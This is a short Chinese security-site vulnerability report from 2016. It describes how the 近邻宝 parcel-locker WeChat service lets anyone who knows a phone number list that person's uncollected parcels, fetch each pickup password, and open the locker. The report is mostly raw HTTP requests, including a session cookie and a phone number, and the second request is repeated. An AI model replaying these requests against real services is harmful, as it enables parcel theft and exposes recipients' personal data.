频道栏目
首页 > 资讯 > 网络安全 > 正文

近邻宝可任意开箱领取别人快递(需知道手机号前提)

16-05-16        来源:[db:作者]  
收藏   我要投稿

在近邻宝微信企业号中,首先绑定手机号码,在左下角“取快递”=>“待取”处抓包
POST /weixin/ordinary/customer/get/not/receive/list/ HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Origin: http://snsbroker.jinlb.cn
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: snsbroker.jinlb.cn
Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1
Content-Length: 24
phone=13521993016&page=1
修改phone参数可以查询该手机号码的未领取的快件(包含order_id,sign参数),一个order_id对应一个sign参数

利用这两个参数,发送如下请求
GET /weixin/ordinary/customer/order/detail?order_id=5574445&sign=9c79ae32889e4f8eaed09cc456191e6d<ype=rece HTTP/1.1
Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Accept-Encoding: gzip
Host: snsbroker.jinlb.cn
Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1

有了密码就可以开箱取货了。

利用这两个参数,发送如下请求
GET /weixin/ordinary/customer/order/detail?order_id=5574445&sign=9c79ae32889e4f8eaed09cc456191e6d<ype=rece HTTP/1.1
Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Accept-Encoding: gzip
Host: snsbroker.jinlb.cn
Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1

有了密码就可以开箱取货了。
 

相关TAG标签
上一篇:第5课:基于案例一节课贯通SparkStreaming流计算框架的运行源码
下一篇:利用SSRF漏洞接管APP服务器
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站